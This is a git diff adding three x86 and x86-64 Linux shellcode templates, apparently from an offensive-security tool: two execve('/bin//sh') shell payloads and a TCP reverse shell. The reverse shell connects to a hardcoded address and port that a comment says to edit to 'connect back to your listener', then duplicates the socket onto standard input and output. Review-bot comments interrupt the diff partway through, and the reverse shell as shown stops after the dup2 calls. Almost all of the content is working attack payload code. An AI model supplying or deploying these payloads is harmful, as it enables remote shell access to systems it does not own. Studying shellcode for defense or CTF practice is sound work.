Diffstat (limited to 'templates/shellcode/examples')
-rw-r--r-- | templates/shellcode/examples/shell32.asm | 16 | ||||
-rw-r--r-- | templates/shellcode/examples/shell64.asm | 24 | ||||
-rw-r--r-- | templates/shellcode/examples/tcp64.asm | 49 |
3 files changed, 89 insertions, 0 deletions
diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
new file mode 100644
index 0000000..6238469
--- /dev/null
+++ b/templates/shellcode/examples/shell32.asm
@@ -0,0 +1,16 @@
+; Originally based on https://www.exploit-db.com/shellcodes/46809
+; See shell64.asm for more details.
+
+; execve("/bin/sh", ["/bin/sh"], [])
+xor eax, eax
+xor ecx, ecx
+push ecx
+push 0x68732f2f
+push 0x6e69622f
+mov ebx, esp
+push ecx
+mov edx, esp
+push ebx
+mov ecx, esp
+mov al, 11
+int 0x80
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
new file mode 100644
index 0000000..3812c33
--- /dev/null
+++ b/templates/shellcode/examples/shell64.asm
@@ -0,0 +1,24 @@
+; Originally based on https://www.exploit-db.com/shellcodes/47008
+
+; stack layout
+;
+; ┏━━━━━━━━━━━━━━┓
+; ┃ v
+; [ argv0, NULL ] "/bin//sh" NULL
+; ^ ^ ^
+; ┃ ┃ ┃
+; argv envp filename
+
+; execve("/bin/sh", ["/bin/sh"], [])
+xor rax, rax
+xor rsi, rsi
+mov rdi, 0x68732f2f6e69622f
+push rsi
+push rdi
+mov rdi, rsp
+push rsi
+mov rdx, rsp
+push rdi
+mov rsi, rsp
+mov al, 59
+syscall
diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm
new file mode 100644
index 0000000..1ec3bc8
--- /dev/null
+++ b/templates/shellcode/examples/tcp64.asm
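Review bot: The comment `; execve("/bin/sh", ["/bin/sh"], [])` does not match the bytes pushed: `0x68732f2f` is "//sh" and `0x6e69622f` is "/bin", so the path handed to the kernel is "/bin//sh"; shell64.asm carries the same comment while its own diagram correctly says "/bin//sh". Annotate the two pushes with `; "//sh"` and `; "/bin"` and change the comment to `; execve("/bin//sh", ["/bin//sh"], [])` in both files. Neither file states its assembler syntax or target; a first-line header such as `; NASM, Intel syntax; Linux i386, int 0x80 syscall ABI (eax=nr, ebx/ecx/edx=args)` here, and the x86-64 `syscall` equivalent in shell64.asm, would save a reader guessing which register convention the code assumes.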
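Review bot: `mov rdi, 0x68732f2f6e69622f` is the one line that has to be decoded byte by byte, and it has no comment; add `; "/bin//sh" as a little-endian qword`. The stack-layout diagram names argv, envp and filename but not the registers that end up holding them, so a line `; rdi = filename, rsi = argv, rdx = envp` under the `; execve(...)` comment (or register names in the diagram's bottom row) would tie the picture to the `mov rdi, rsp` / `mov rdx, rsp` / `mov rsi, rsp` lines. The diagram's column alignment appears to have been collapsed in this rendering; worth confirming the committed file still lines up.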
@@ -0,0 +1,49 @@
+; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html
+
+; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+xor rdx, rdx
+mov al, 41
+mov dil, 2
+mov sil, 1
+syscall
+
+; !! Edit this section to connect back to your listener !!
+;
+; struct sockaddr_in { // Struct size: 16
+; short int sin_family; // AF_INET (2)
+; unsigned short int sin_port; // Set to 8080 below
+; struct in_addr sin_addr; // Set to 127.0.0.1 below
+; unsigned char sin_zero[8];
+; };
+;
+; struct in_addr { // Struct size: 4
+; uint32_t s_addr;
+; };
+xor rbx, rbx
+push rbx
+mov rbx, 0x0100007f901f0002
+push rbx
+
+; connect(fd, sockaddr, sizeof sockaddr)
+mov rdi, rax
+mov rsi, rsp
+mov dl, 16
+xor rax, rax
+mov al, 42
+syscall
+
+; dup2(fd, stdin)
+; dup2(fd, stdout)
+; dup2(fd, stderr)
+xor rsi, rsi
+mov al, 33
+syscall
+mov sil, 1
+mov al, 33
+syscall
+mov sil, 2
+mov al, 33
+syscall |
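Review bot: The three `mov al, 33` in the dup2 block write only the low byte of rax and so depend on the previous syscall's return value having zero upper bytes (0 from connect, then the 0 and 1 that dup2 returns), whereas the connect block clears rax with `xor rax, rax` first; `mov dl, 16` likewise depends on the `xor rdx, rdx` at the top and on `syscall` not clobbering rdx. Either add `xor rax, rax` before each `mov al, 33` for consistency with the connect block, or state the assumption on the first one, e.g. `; rax is 0 here only if connect succeeded`. The `mov rbx, 0x0100007f901f0002` line encodes the fields the comment block describes but does not say how; a comment `; sin_family=2, sin_port=htons(8080), s_addr=127.0.0.1, packed as one little-endian qword` on that line would let a reader verify the value against the struct definition above it.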